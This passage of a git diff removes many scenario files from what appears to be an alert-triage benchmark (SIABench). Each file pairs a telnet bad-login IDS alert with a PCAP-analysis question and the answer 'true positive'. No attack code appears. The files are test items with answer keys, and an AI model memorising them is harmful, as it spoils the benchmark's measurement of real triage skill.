command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21572.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21572.json deleted file mode 100644 index b482dc808f39593be18480231814cbb7ef330784..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21572.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21572", - "alert_type": "True", - "alert_name": "dp_21572" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:13:47.954345 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60404", - "alert": "01/02-00:13:47.954345 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60404", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21589.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21589.json deleted file mode 100644 index 93182560d6e9ad31d0447d6ea3a0609d67eb4f4b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21589.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21589", - "alert_type": "True", - "alert_name": "dp_21589" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:12.978957+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:41700", - "alert": "1970-01-02T00:11:12.978957+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:41700", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21590.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21590.json deleted file mode 100644 index b7e8972f516b4ae8b6e321c0584c5fd3ad4a5b95..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21590.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21590", - "alert_type": "True", - "alert_name": "dp_21590" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:14.039664+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:41688", - "alert": "1970-01-02T00:11:14.039664+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:41688", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21596.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21596.json deleted file mode 100644 index 9e6288f67a1383b9da715d63aabc9685dc6a0d58..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21596.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21596", - "alert_type": "True", - "alert_name": "dp_21596" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:23.395694+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40162", - "alert": "1970-01-02T00:11:23.395694+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40162", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21602.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21602.json deleted file mode 100644 index c9a68e9e78aa8bda46e90c83e084be0140c7663d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21602.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21602", - "alert_type": "True", - "alert_name": "dp_21602" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:33.461522+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47436", - "alert": "1970-01-02T00:11:33.461522+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47436", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21604.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21604.json deleted file mode 100644 index 42bde4ac6a83f4840782ecf3421dc94d99325878..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21604.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21604", - "alert_type": "True", - "alert_name": "dp_21604" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:36.706962+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51226", - "alert": "1970-01-02T00:11:36.706962+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51226", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21608.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21608.json deleted file mode 100644 index 4a53ca6ea7d5a694e7eab23dae32a6b9e9e2bb44..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21608.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21608", - "alert_type": "True", - "alert_name": "dp_21608" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:39.917139+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51254", - "alert": "1970-01-02T00:11:39.917139+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51254", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21609.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21609.json deleted file mode 100644 index 70fd46f45234116e195b2abf8645563e55a3e1ab..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21609.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21609", - "alert_type": "True", - "alert_name": "dp_21609" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:40.259245+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51268", - "alert": "1970-01-02T00:11:40.259245+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51268", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21610.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21610.json deleted file mode 100644 index a9780506903f85a69322d1b78b1fb957a5f0d4ed..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21610.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21610", - "alert_type": "True", - "alert_name": "dp_21610" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:43.214053+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51282", - "alert": "1970-01-02T00:11:43.214053+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51282", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21618.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21618.json deleted file mode 100644 index 178c3cf7b2d8506f356d6442476235d2652d3d39..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21618.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21618", - "alert_type": "True", - "alert_name": "dp_21618" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:11:54.926485+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56020", - "alert": "1970-01-02T00:11:54.926485+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56020", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21622.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21622.json deleted file mode 100644 index 638d3b61b8b1b41da01bb93105211b3da3f20566..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21622.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21622", - "alert_type": "True", - "alert_name": "dp_21622" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:00.947600+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60270", - "alert": "1970-01-02T00:12:00.947600+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60270", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21627.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21627.json deleted file mode 100644 index 8405438416be825f1fa840ac9f69946d1152677a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21627.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21627", - "alert_type": "True", - "alert_name": "dp_21627" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:08.418081+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36306", - "alert": "1970-01-02T00:12:08.418081+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36306", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21637.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21637.json deleted file mode 100644 index e68fc1aebfca31701eaa2f1122edd1b9479e964a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21637.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21637", - "alert_type": "True", - "alert_name": "dp_21637" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:22.599290+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44126", - "alert": "1970-01-02T00:12:22.599290+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44126", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21639.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21639.json deleted file mode 100644 index 7b4571d770c346dfc022cab1e56486105015da42..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21639.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21639", - "alert_type": "True", - "alert_name": "dp_21639" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:25.957969+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44164", - "alert": "1970-01-02T00:12:25.957969+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:44164", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21641.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21641.json deleted file mode 100644 index 3552f33bfff7e73baf3f295941e2eb9dc9e205e8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21641.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21641", - "alert_type": "True", - "alert_name": "dp_21641" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:29.540379+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40434", - "alert": "1970-01-02T00:12:29.540379+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40434", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21646.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21646.json deleted file mode 100644 index 2b73fb2969e7c7d03fd5b9273d90286788abe5f3..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21646.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21646", - "alert_type": "True", - "alert_name": "dp_21646" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:38.132186+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:53534", - "alert": "1970-01-02T00:12:38.132186+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:53534", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21650.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21650.json deleted file mode 100644 index c44b96b50b6904b432f7d1fc84dfaee1f8f8196a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21650.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21650", - "alert_type": "True", - "alert_name": "dp_21650" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:41.820471+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:53550", - "alert": "1970-01-02T00:12:41.820471+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:53550", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21654.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21654.json deleted file mode 100644 index fb4a9de8c881a644a20d9f53a6e29904ae0b367d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21654.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21654", - "alert_type": "True", - "alert_name": "dp_21654" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:49.946448+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43538", - "alert": "1970-01-02T00:12:49.946448+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43538", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21656.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21656.json deleted file mode 100644 index 5e271e4a6ce6a561c0eb894f232057a462fb4270..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21656.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21656", - "alert_type": "True", - "alert_name": "dp_21656" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:52.442151+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43568", - "alert": "1970-01-02T00:12:52.442151+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43568", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21657.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21657.json deleted file mode 100644 index f1b945c800e76670177fe5edb884d54329cb473f..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21657.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21657", - "alert_type": "True", - "alert_name": "dp_21657" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:12:53.873953+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43572", - "alert": "1970-01-02T00:12:53.873953+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43572", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21658.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21658.json deleted file mode 100644 index afad838c58afb40025b40a6d6ad731d46a86c724..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21658.json +++ /dev/null @@ -1,47 +0,0 @@ 